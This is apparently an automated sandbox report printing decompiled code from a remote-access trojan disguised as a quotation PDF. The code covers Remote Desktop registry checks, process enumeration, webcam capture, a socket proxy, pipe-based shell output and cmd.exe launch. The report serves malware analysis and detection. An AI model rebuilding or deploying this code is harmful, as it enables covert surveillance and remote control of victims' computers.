				char _v48;
				char _v52;
				char _v60;
				signed int _t81;
				signed int _t90;
				signed int _t92;
				signed int _t95;
				void* _t102;
				WCHAR* _t124;

				_v44 = __ecx;
				E00420A26( &_v12);
				E00406F64( &_v20, L"SYSTEM\\CurrentControlSet\\Services\\TermService");
				E00406F64( &_v16, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
				E00406692( &_v60);
				if(E00420997( &_v12, 0x80000002,  &_v20, 0x20119, 0) != 0) {
					_t81 = E0042080B( &_v12, E00406F64( &_v36, L"ImagePath"),  &_v60);
					__eflags = _t81;
					if(_t81 != 0) {
						_t16 =  &_v28;
						 *_t16 = _v28 & 0x00000000;
						__eflags =  *_t16;
					} else {
						_v28 = 1;
					}
					_v5 = _v28;
					E00406BE2();
					__eflags = _v5 & 0x000000ff;
					if((_v5 & 0x000000ff) == 0) {
						E004207E9( &_v12);
						E00406458( &_v60, __eflags,  &_v24);
						E004065E7();
						_t90 = StrStrW(E00406F44( &_v24), L"svchost.exe");
						__eflags = _t90;
						if(_t90 != 0) {
							L10:
							_t92 = E00420997( &_v12, 0x80000002,  &_v16, 0x20119, 0);
							__eflags = _t92;
							if(_t92 != 0) {
								_t95 = E0042080B( &_v12, E00406F64( &_v40, L"ServiceDll"),  &_v60);
								__eflags = _t95;
								if(_t95 != 0) {
									_t49 =  &_v32;
									 *_t49 = _v32 & 0x00000000;
									__eflags =  *_t49;
								} else {
									_v32 = 1;
								}
								_v6 = _v32;
								E00406BE2();
								__eflags = _v6 & 0x000000ff;
								if(__eflags == 0) {
									_t102 = E00406930( &_v60, __eflags,  &_v48, E00406458( &_v60, __eflags,  &_v52));
									__eflags = _v44 + 0x20;
									E00406BFC(_v44 + 0x20, _t102);
									E00406BE2();
									E00406BE2();
									E004207E9( &_v12);
									E00406BE2();
									E004066DA();
									E00406BE2();
									E00406BE2();
									return E004207D8( &_v12);
								} else {
									E004207E9( &_v12);
									E00406BE2();
									E004066DA();
									E00406BE2();
									E00406BE2();
									return E004207D8( &_v12);
								}
							}
							E00406BE2();
							E004066DA();
							E00406BE2();
							E00406BE2();
							return E004207D8( &_v12);
						}
						_t124 = StrStrW(E00406F44( &_v24), L"svchost.exe -k");
						__eflags = _t124;
						if(_t124 != 0) {
							goto L10;
						}
						E00406BE2();
						E004066DA();
						E00406BE2();
						E00406BE2();
						return E004207D8( &_v12);
					} else {
						E004207E9( &_v12);
						E004066DA();
						E00406BE2();
						E00406BE2();
						return E004207D8( &_v12);
					}
				}
				E004066DA();
				E00406BE2();
				E00406BE2();
				return E004207D8( &_v12);
			}

0x0041bb35
0x0041bb3b
0x0041bb48
0x0041bb55
0x0041bb5d
0x0041bb7c
0x0041bbb8
0x0041bbbd
0x0041bbbf
0x0041bbca
0x0041bbca
0x0041bbca
0x0041bbc1
0x0041bbc1
0x0041bbc1
0x0041bbd1
0x0041bbd7
0x0041bbe0
0x0041bbe2
0x0041bc14
0x0041bc20
0x0041bc28
0x0041bc3b
0x0041bc41
0x0041bc43
0x0041bc8a
0x0041bc9d
0x0041bca2
0x0041bca4
0x0041bce8
0x0041bced
0x0041bcef
0x0041bcfa
0x0041bcfa
0x0041bcfa
0x0041bcf1
0x0041bcf1
0x0041bcf1
0x0041bd01
0x0041bd07
0x0041bd10
0x0041bd12
0x0041bd57
0x0041bd62
0x0041bd65
0x0041bd6d
0x0041bd75
0x0041bd7d
0x0041bd85
0x0041bd8d
0x0041bd95
0x0041bd9d
0x00000000
0x0041bd14
0x0041bd17
0x0041bd1f
0x0041bd27
0x0041bd2f
0x0041bd37
0x00000000
0x0041bd3f
0x0041bd12
0x0041bca9
0x0041bcb1
0x0041bcb9
0x0041bcc1
0x00000000
0x0041bcc9
0x0041bc53
0x0041bc59
0x0041bc5b
0x00000000
0x00000000
0x0041bc60
0x0041bc68
0x0041bc70
0x0041bc78
0x00000000
0x0041bbe4
0x0041bbe7
0x0041bbef
0x0041bbf7
0x0041bbff
0x00000000
0x0041bc07
0x0041bbe2
0x0041bb81
0x0041bb89
0x0041bb91
0x00000000

Strings

SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0041BB4D
svchost.exe, xrefs: 0041BC2D
svchost.exe -k, xrefs: 0041BC45
ImagePath, xrefs: 0041BBA7
SYSTEM\CurrentControlSet\Services\TermService, xrefs: 0041BB40
ServiceDll, xrefs: 0041BCD7

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: lstrlen$Createlstrcpy
String ID: ImagePath$SYSTEM\CurrentControlSet\Services\TermService$SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$svchost.exe$svchost.exe -k
API String ID: 1414535636-3333427388
Opcode ID: e20e431042fbb3b8b1aefcce161c68c3593896b1600f30bdd3ca78ee48383c4c
Instruction ID: 1ba0ed0f1387abd89f91d591a46eb84db22a617b9bc24c6d9663d0f69af47d98
Opcode Fuzzy Hash: e20e431042fbb3b8b1aefcce161c68c3593896b1600f30bdd3ca78ee48383c4c
Instruction Fuzzy Hash: C361C271905119AADB04FBA2DC529FDB774AF10308F91047EF413760D2EF38AB5ACA59

Uniqueness

Uniqueness Score: -1.00%

Function 00420518 Relevance: 12.1, APIs: 8, Instructions: 119
processCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00420518(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v52;
				intOrPtr _v56;
				char _v576;
				long _v604;
				void* _v612;
				char _v1652;
				int _t55;
				int _t73;
				void* _t107;
				void* _t108;

				E0040132F( &_v612, 0, 0x22c);
				_t108 = _t107 + 0xc;
				_v612 = 0x22c;
				E00402E00( &_v52);
				_v8 = CreateToolhelp32Snapshot(2, 0);
				if(_v8 == 0xffffffff) {
					L11:
					E00401721(_a4, __eflags,  &_v52);
					E00401788( &_v52);
					return _a4;
				}
				_push( &_v612);
				_t55 = Process32FirstW(_v8);
				_t111 = _t55;
				if(_t55 != 0) {
					do {
						E004023DE( &_v24, __eflags);
						_v24 = _v604;
						E00406A11( &_v20,  &_v576);
						_v12 = OpenProcess(0x1410, 0, _v604);
						__eflags = _v12 - 0xffffffff;
						if(_v12 == 0xffffffff) {
							E00406BFC( &_v16, E00406F64( &_v36, "-"));
							E00406BE2();
						} else {
							E0040132F( &_v1652, 0, 0x410);
							_t108 = _t108 + 0xc;
							_v56 = 0x208;
							_t73 =  &_v1652;
							__imp__K32GetModuleFileNameExW(_v12, 0, _t73, 0x208);
							__eflags = _t73;
							if(_t73 == 0) {
								E00406BFC( &_v16, E00406F64( &_v32, "-"));
								E00406BE2();
							} else {
								E00406BFC( &_v16, E00406F64( &_v28,  &_v1652));
								E00406BE2();
							}
							CloseHandle(_v12);
						}
						_t108 = _t108 - 0xc;
						E0040243C(_t108,  &_v24);
						E00401B70( &_v52);
						E004018E2( &_v24, __eflags);
						__eflags = Process32NextW(_v8,  &_v612);
					} while (__eflags != 0);
					CloseHandle(_v8);
					goto L11;
				}
				CloseHandle(_v8);
				E00401721(_a4, _t111,  &_v52);
				E00401788( &_v52);
				return _a4;
			}

0x0042052f
0x00420534
0x00420537
0x00420544
0x00420553
0x0042055a
0x004206b9
0x004206c0
0x004206c8
0x00000000
0x004206cd
0x00420566
0x0042056a
0x00420570
0x00420572
0x00420599
0x0042059c
0x004205a7
0x004205b4
0x004205cc
0x004205cf
0x004205d3
0x0042066d
0x00420675
0x004205d9
0x004205e7
0x004205ec
0x004205ef
0x004205fb
0x00420607
0x0042060d
0x0042060f
0x00420644
0x0042064c
0x00420611
0x00420624
0x0042062c
0x0042062c
0x00420654
0x00420654
0x0042067a
0x00420683
0x0042068b
0x00420693
0x004206a8
0x004206a8
0x004206b3
0x00000000
0x004206b3
0x00420577
0x00420584
0x0042058c
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0042054D
Process32FirstW.KERNEL32(000000FF,0000022C), ref: 0042056A
CloseHandle.KERNEL32(000000FF), ref: 00420577
OpenProcess.KERNEL32(00001410,00000000,?,?), ref: 004205C6
K32GetModuleFileNameExW.KERNEL32(000000FF,00000000,?,00000208), ref: 00420607
CloseHandle.KERNEL32(000000FF,00000000,00429ABC), ref: 00420654
Process32NextW.KERNEL32(000000FF,0000022C), ref: 004206A2
CloseHandle.KERNEL32(000000FF), ref: 004206B3

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: CloseHandle$Process32$CreateFileFirstModuleNameNextOpenProcessSnapshotToolhelp32
String ID:
API String ID: 4202134711-0
Opcode ID: 13c193eee7556689bd6455074b931168e2c73d0680c5276ee0d306d4f9f7a2c9
Instruction ID: 95213ab85e05a1eb214038a7a4bc25d64ef6c0e86d840dde178be953a21bc56d
Opcode Fuzzy Hash: 13c193eee7556689bd6455074b931168e2c73d0680c5276ee0d306d4f9f7a2c9
Instruction Fuzzy Hash: 3E412C70A0011CAADB10EBA0EC96FEEB778BF10304F90417AF106B61E1DB756B56DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00423594 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 286
comCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E00423594(intOrPtr* __ecx, void* __edx) {
				intOrPtr _v8;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v122;
				intOrPtr _v128;
				intOrPtr _v132;
				void _v136;
				void _v172;
				void* _v228;
				char _v244;
				intOrPtr _v248;
				char _v316;
				void* _t178;
				intOrPtr _t207;
				void* _t238;
				intOrPtr _t262;
				void* _t272;
				signed int _t279;
				signed int _t284;
				void* _t293;
				void* _t294;
				void* _t307;
				void* _t315;
				signed int _t319;
				void* _t322;
				void* _t323;

				_t293 = __edx;
				_t266 = _t319;
				_v8 =  *((intOrPtr*)(_t319 + 4));
				_t322 = (_t319 & 0xfffffff8) + 4 - 0x130;
				_v16 = __ecx;
				__imp__CoInitialize(0, _t294, _t307, _t315, __ecx, __ecx);
				__imp__CoCreateInstance(0x4263e0, 0, 1, 0x42a4a8, E004045FD(_v16 + 0x18));
				if( *((intOrPtr*)(_v16 + 0x18)) != 0) {
					_v20 =  *((intOrPtr*)(_v16 + 0x18));
					_v24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v16 + 0x18))))));
					_v24(_v20, 0x4263c0, _v16 + 0x1c);
					if( *((intOrPtr*)(_v16 + 0x1c)) != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v16 + 0x1c)))) + 4))( *((intOrPtr*)(_v16 + 0x1c)));
						E004231FC(_v16 + 0x20,  *((intOrPtr*)(_t266 + 8)), _v16 + 0x20);
						if( *((intOrPtr*)(_v16 + 0x20)) != 0) {
							_t178 = E004045FD(_v16 + 0x24);
							_pop(_t272);
							__imp__CoCreateInstance(0x426430, 0, 1, 0x42a498, _t178);
							if( *((intOrPtr*)(_v16 + 0x24)) != 0) {
								_v28 =  *((intOrPtr*)(_v16 + 0x24));
								_v32 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v16 + 0x24)))) + 0xc));
								_v32(_v28,  *((intOrPtr*)(_v16 + 0x20)), L"Source");
								_v36 =  *((intOrPtr*)(_v16 + 0x24));
								_v40 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v16 + 0x24)))) + 0xc));
								_v40(_v36,  *((intOrPtr*)(_v16 + 0x1c)), L"Grabber");
								E0040132F( &_v244, 0, 0x48);
								_t323 = _t322 + 0xc;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_v44 =  *((intOrPtr*)(_v16 + 0x18));
								_v48 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v16 + 0x18)))) + 0x10));
								_v48(_v44,  &_v244);
								_t207 = E00422CC8(_t272,  *((intOrPtr*)(_v16 + 0x20)), 0);
								_t275 = _v16;
								 *((intOrPtr*)(_v16 + 0x28)) = _t207;
								if( *((intOrPtr*)(_v16 + 0x28)) != 0) {
									 *((intOrPtr*)(_v16 + 0x2c)) = E00422CE9(_t275,  *((intOrPtr*)(_v16 + 0x1c)), 0);
									if( *((intOrPtr*)(_v16 + 0x2c)) != 0) {
										_v52 =  *((intOrPtr*)(_v16 + 0x24));
										_v56 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v16 + 0x24)))) + 0x2c));
										_push( *((intOrPtr*)(_v16 + 0x2c)));
										_push( *((intOrPtr*)(_v16 + 0x28)));
										_push(_v52);
										if(_v56() >= 0) {
											_v60 =  *((intOrPtr*)(_v16 + 0x18));
											_v64 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v16 + 0x18)))) + 0x14));
											_v64(_v60,  &_v316);
											_v68 = _v248;
											_t279 = 0xa;
											memcpy( &_v136, _v68 + 0x30, _t279 << 2);
											E00422A2F( &_v316);
											E0042330A(_v16, _t293,  *((intOrPtr*)(_t266 + 8)), _v128, _v132, _v122);
											_v76 =  *_v16;
											_v72 = _v16 + 4;
											_t238 = E00404A87(_v72,  *((intOrPtr*)(_t266 + 8)));
											_t284 = 7;
											memcpy( &_v172, _t238, _t284 << 2);
											memcpy(_t323 + 0x18 - 0x1c,  &_v172, 0 << 2);
											E00422BD8(_v76, 7);
											 *((intOrPtr*)(_v16 + 0x30)) = E00422CC8(_v76,  *((intOrPtr*)(_v16 + 0x1c)), 0);
											if( *((intOrPtr*)(_v16 + 0x30)) != 0) {
												_v80 =  *((intOrPtr*)(_v16 + 0x18));
												_v84 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v16 + 0x18)))) + 0x24));
												_v84(_v80,  *_v16, 0);
												_v88 =  *((intOrPtr*)(_v16 + 0x24));
												_v92 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v16 + 0x24))))));
												_v92(_v88, 0x426400, _v16 + 0x34);
												_t262 = _v16;
												if( *((intOrPtr*)(_t262 + 0x34)) != 0) {
													_t262 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v16 + 0x34)))) + 0x1c))( *((intOrPtr*)(_v16 + 0x34)));
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return _t262;
			}

0x00423594
0x00423595
0x004235a3
0x004235a9
0x004235b1
0x004235b6
0x004235d8
0x004235e5
0x004235f2
0x004235ff
0x00423611
0x0042361b
0x00423630
0x0042363d
0x0042364b
0x00423659
0x0042365e
0x0042366e
0x0042367b
0x00423688
0x00423696
0x004236a7
0x004236b0
0x004236be
0x004236cf
0x004236dd
0x004236e2
0x004236f0
0x004236f1
0x004236f2
0x004236f3
0x004236ff
0x00423700
0x00423701
0x00423702
0x00423709
0x00423717
0x00423724
0x0042372f
0x00423736
0x00423739
0x00423743
0x0042375c
0x00423766
0x00423773
0x00423781
0x00423787
0x0042378d
0x00423790
0x00423798
0x004237a5
0x004237b3
0x004237c0
0x004237c9
0x004237d4
0x004237d8
0x004237e1
0x004237f6
0x00423800
0x00423809
0x00423812
0x00423819
0x00423822
0x00423832
0x00423837
0x0042384e
0x00423858
0x00423862
0x00423870
0x0042387d
0x00423886
0x00423893
0x004238a5
0x004238a8
0x004238af
0x004238c1
0x004238c1
0x004238af
0x00423858
0x00423798
0x00423766
0x00423743
0x0042367b
0x0042364b
0x0042361b
0x004238cc

APIs

CoInitialize.OLE32(00000000), ref: 004235B6
CoCreateInstance.OLE32(004263E0,00000000,00000001,0042A4A8,00000000), ref: 004235D8

Strings

vids, xrefs: 004236E5
Grabber, xrefs: 004236C1
Source, xrefs: 00423699

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: CreateInitializeInstance
String ID: Grabber$Source$vids
API String ID: 3519745914-4200688928
Opcode ID: 12126e61f437225772e559c2deb5fc7ef7410288491d129e78a9771c960e8751
Instruction ID: c2ba725eef50d9b495e45cc1a1d09e0575bf0e249a435e24e7f1364a63e48663
Opcode Fuzzy Hash: 12126e61f437225772e559c2deb5fc7ef7410288491d129e78a9771c960e8751
Instruction Fuzzy Hash: 29C1BD75A00218EFCB04DF98DA81A9DBBF1EF08310F614096F905AB3A1C775AE45EF54

Uniqueness

Uniqueness Score: -1.00%

Function 0041D7C2 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 266
threadnetworkCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E0041D7C2(intOrPtr _a4) {
				signed char _v5;
				void* _v12;
				char _v15;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				char* _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				signed int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr* _v72;
				short _v76;
				signed int _v80;
				intOrPtr _v84;
				intOrPtr* _v88;
				short _v92;
				intOrPtr _v96;
				intOrPtr* _v100;
				short _v104;
				long _v108;
				char _v117;
				char _v119;
				char _v120;
				void* _v124;
				intOrPtr _v144;
				char _v148;
				char _v152;
				void _v156;
				char _v168;
				char _v2220;
				signed int _t136;
				void* _t186;
				signed int _t219;
				void* _t249;
				void* _t251;

				 *0x42cec4 = _a4;
				while(1 != 0) {
					E0041DBFB( &_v168,  *0x42cec4);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t136 =  *0x42cc8e & 0x000000ff;
					if(_t136 == 0) {
						return _t136;
					}
					_v5 = 0;
					_v40 = E0040B8BA(0xc);
					if(_v40 == 0) {
						_v52 = _v52 & 0x00000000;
					} else {
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_v52 = _v40;
					}
					_v12 = _v52;
					if( *((intOrPtr*)(0x42cec8 + _v28 * 0xc)) == _v28) {
						_v5 = 1;
						_v12 = 0x42cec8 + _v28 * 0xc;
					}
					if((_v5 & 0x000000ff) != 0) {
						_t35 = _v12 + 4; // 0xec81ec8b
						if( *_t35 != 1) {
							_t128 = _v12 + 8; // 0x824
							__imp__#19( *_t128, _v20, _v24, 0);
							_v124 = _v12;
							L23:
							E00401014(_v20);
							goto L24;
						}
						_v48 = _v20;
						E0040132F( &_v2220, 0, 0x802);
						_t219 = 8;
						memset( &_v156, 0, _t219 << 2);
						_t251 = _t249 + 0x18;
						_v60 = _v60 & 0x00000000;
						_v36 = _v36 & 0x00000000;
						asm("stosd");
						asm("stosd");
						asm("stosw");
						if( *((char*)(_v48 + 3)) != 1) {
							if( *((char*)(_v48 + 3)) != 3) {
								if( *((char*)(_v48 + 3)) == 4) {
									_v64 = _v20 + 4;
									__imp__InetNtopW(0x17, _v64,  &_v2220, 0x802);
									_v100 = _v20 + 8;
									_v104 =  *_v100;
									_v36 = E0041DD40( *_v100, _v64, _v104);
								}
							} else {
								_v32 = _v20 + 4;
								memset( &_v156, 0, 0 << 2);
								_v152 = 2;
								_v148 = 1;
								_v144 = 6;
								_v44 = E00401000(0x200);
								E00401309(_v44, _v32 + 1,  *_v32);
								_t251 = _t251 + 0x18;
								_v80 = _v80 & 0x00000000;
								 *((char*)(_v44 +  *_v32)) = _v80;
								_t186 =  &_v156;
								__imp__getaddrinfo(_v44, 0, _t186,  &_v60, 8);
								_v84 = _t186;
								if(_v84 == 0) {
									_v88 = _v20 +  *_v32 + 5;
									_v92 =  *_v88;
									_v96 =  *((intOrPtr*)(_v60 + 0x18));
									_v36 = E0041DDC2(_v96 + 4, _v92);
								}
							}
						} else {
							_v56 = _v20 + 4;
							__imp__InetNtopW(2, _v56,  &_v2220, 0x802);
							_v72 = _v20 + 8;
							_v76 =  *_v72;
							_v36 = E0041DDC2(_v56, _v76);
						}
						_v120 = 5;
						_v119 = 0;
						_v117 = 1;
						E0041DB9E( *0x42cec4,  &_v120, 0xa, _v28);
						_t249 = _t251 + 0x10;
						 *((char*)(_v12 + 4)) = 2;
						 *(_v12 + 8) = _v36;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v108 = _v108 & 0x00000000;
						CreateThread(0, 0, E0041DAFE, _v12, 0,  &_v108);
						goto L23;
					} else {
						_v68 = _v20;
						_v16 = 0;
						_v16 = 5;
						_v15 = 0;
						E0041DB9E( *0x42cec4,  &_v16, 2, _v28);
						_t249 = _t249 + 0x10;
						 *((char*)(_v12 + 4)) = 1;
						 *_v12 = _v28;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						L24:
						continue;
					}
				}
				return 1;
			}

0x0041d7d0
0x0041d7d5
0x0041d7eb
0x0041d7f7
0x0041d7f8
0x0041d7f9
0x0041d7fa
0x0041d803
0x00000000
0x00000000
0x0041d80a
0x0041d816
0x0041d81d
0x0041d82f
0x0041d81f
0x0041d824
0x0041d825
0x0041d826
0x0041d82a
0x0041d82a
0x0041d836
0x0041d846
0x0041d848
0x0041d855
0x0041d855
0x0041d85e
0x0041d8b2
0x0041d8b9
0x0041dae0
0x0041dae3
0x0041dae9
0x0041daec
0x0041daef
0x00000000
0x0041daf4
0x0041d8c2
0x0041d8d3
0x0041d8dd
0x0041d8e6
0x0041d8e6
0x0041d8e8
0x0041d8ec
0x0041d8f5
0x0041d8f6
0x0041d8f7
0x0041d903
0x0041d957
0x0041da2d
0x0041da35
0x0041da49
0x0041da55
0x0041da5e
0x0041da6f
0x0041da6f
0x0041d95d
0x0041d963
0x0041d971
0x0041d973
0x0041d97d
0x0041d987
0x0041d99c
0x0041d9ae
0x0041d9b3
0x0041d9b6
0x0041d9c6
0x0041d9cd
0x0041d9d9
0x0041d9df
0x0041d9e6
0x0041d9f7
0x0041da00
0x0041da0a
0x0041da1e
0x0041da1e
0x0041da21
0x0041d905
0x0041d90b
0x0041d91f
0x0041d92b
0x0041d934
0x0041d945
0x0041d945
0x0041da72
0x0041da76
0x0041da7a
0x0041da8d
0x0041da92
0x0041da98
0x0041daa2
0x0041dab4
0x0041dab5
0x0041dab6
0x0041dab7
0x0041dacd
0x00000000
0x0041d860
0x0041d863
0x0041d868
0x0041d86c
0x0041d870
0x0041d883
0x0041d888
0x0041d88e
0x0041d898
0x0041d8a7
0x0041d8a8
0x0041d8a9
0x0041daf5
0x00000000
0x0041daf5
0x0041d85e
0x0041dafd

APIs

Part of subcall function 0041DBFB: recv.WS2_32(?,?,00000008,00000000), ref: 0041DC4E

InetNtopW.WS2_32(00000002,?,?,00000802), ref: 0041D91F

Part of subcall function 0041DDC2: socket.WS2_32(00000002,00000001,00000006), ref: 0041DDD9
Part of subcall function 0041DDC2: connect.WS2_32(?,?,00000010), ref: 0041DE00

getaddrinfo.WS2_32(?,00000000,?,00000000), ref: 0041D9D9
CreateThread.KERNEL32 ref: 0041DACD
send.WS2_32(00000824,?,?,00000000), ref: 0041DAE3

Strings

pREw, xrefs: 0041D9D9

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: CreateInetNtopThreadconnectgetaddrinforecvsendsocket
String ID: pREw
API String ID: 3225483506-1714215553
Opcode ID: 26656d324d17237820eabbfa1e4560488cbc57d6a7c468cfd52b1cb0666d5093
Instruction ID: 92e79091f1367b750e9fa1271e85563838b2188eb05d6fb94fed8fdffff63f83
Opcode Fuzzy Hash: 26656d324d17237820eabbfa1e4560488cbc57d6a7c468cfd52b1cb0666d5093
Instruction Fuzzy Hash: 97B149B2D04248AFDF11CFA4D885BEEBBB5BF09301F1040AAE504BB261D775AA85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0041CFD7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 123
pipeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0041CFD7(intOrPtr* __ecx) {
				char* _v8;
				long _v12;
				intOrPtr* _v16;
				long _v20;
				signed int _v24;
				short* _v28;
				char _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v52;
				char _v60;
				signed int _t55;
				signed int _t57;
				int _t66;
				char* _t103;
				void* _t109;

				_v16 = __ecx;
				while(1 != 0) {
					_v12 = _v12 & 0x00000000;
					if(PeekNamedPipe( *(_v16 + 8), 0, 0, 0,  &_v12, 0) != 0) {
						__eflags = _v12;
						if(_v12 != 0) {
							_v8 = E00401000(_v12 + 1);
							_v20 = _v20 & 0x00000000;
							_t66 = ReadFile( *(_v16 + 8), _v8, _v12,  &_v20, 0);
							__eflags = _t66;
							if(_t66 != 0) {
								_v8[_v20] = 0;
								E00406692( &_v60);
								E00406598( &_v60, _v8, _v20);
								_v24 = MultiByteToWideChar(1, 0, _v8, 0xffffffff, 0, 0);
								_v28 = E00401000(_v24 << 2);
								E0040132F(_v28, 0, _v24 << 2);
								_t109 = _t109 + 0xc;
								MultiByteToWideChar(1, 0, _v8, 0xffffffff, _v28, _v24);
								E00401014(_v8);
								E00406F64( &_v36, _v28);
								E004064E1( &_v60, __eflags,  &_v32);
								_v48 = _v48 & 0x00000000;
								_t103 =  &_v32;
								_v52 = E00406747(_t103);
								_v44 =  *((intOrPtr*)( *_v16 + 4));
								E00406FBC(_t109,  &_v36);
								_v44(_t103);
								E00406B06();
								E00406BE2();
								E004066DA();
								continue;
							}
							break;
						}
						return 1;
					}
					break;
				}
				_t55 = GetLastError();
				_v40 = _t55;
				if(_v40 == 0x6d || _v40 == 0xe8) {
					return 0;
				} else {
					_t57 = _t55 | 0xffffffff;
					__eflags = _t57;
					return _t57;
				}
			}

0x0041cfdd
0x0041cfe0
0x0041cfe9
0x0041d007
0x0041d00e
0x0041d012
0x0041d027
0x0041d02a
0x0041d040
0x0041d046
0x0041d048
0x0041d055
0x0041d05b
0x0041d069
0x0041d081
0x0041d091
0x0041d0a0
0x0041d0a5
0x0041d0b7
0x0041d0c0
0x0041d0cc
0x0041d0d8
0x0041d0dd
0x0041d0e1
0x0041d0e9
0x0041d0f4
0x0041d0fe
0x0041d106
0x0041d10c
0x0041d114
0x0041d11c
0x00000000
0x0041d11c
0x00000000
0x0041d04a
0x00000000
0x0041d016
0x00000000
0x0041d009
0x0041d126
0x0041d12c
0x0041d133
0x00000000
0x0041d142
0x0041d142
0x0041d142
0x00000000
0x0041d142

APIs

PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,00000000,00000000), ref: 0041CFFF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0041CF78), ref: 0041D126

Strings

m, xrefs: 0041D12F

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: ErrorLastNamedPeekPipe
String ID: m
API String ID: 1121156904-3775001192
Opcode ID: 6f7bb4874c3f085f362c6cd00dc06e3d0beb902b333f9339113b02f20e5de71c
Instruction ID: d83e8538f4d15410395b22c4fdab11e2b82f26855e9baaf113fd8fc19c5214dc
Opcode Fuzzy Hash: 6f7bb4874c3f085f362c6cd00dc06e3d0beb902b333f9339113b02f20e5de71c
Instruction Fuzzy Hash: 8F410771E00209EBDF10EFA4DC45BEDBBB4AF08314F20416AF511B61E1DB796A91DB19

Uniqueness

Uniqueness Score: -1.00%

Function 00411543 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
sleepprocessmemoryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00411543(void* __ecx, void* __eflags) {
				void* _v8;
				signed int _v12;
				struct _PROCESS_INFORMATION _v28;
				struct _STARTUPINFOA _v96;
				int _t21;
				int _t29;
				signed int _t35;

				_v12 = _v12 & 0x00000000;
				E0041E2F0(__ecx, __eflags,  &_v12);
				_v8 = VirtualAlloc(0, 0xff, 0x1000, 0x40);
				GetWindowsDirectoryA(_v8, 0x104);
				_t21 = lstrlenA(_v8);
				_t35 = 5;
				memcpy(_v8 + _t21, "\\System32\\cmd.exe", _t35 << 2);
				E0040132F( &_v96, 0, 0x44);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
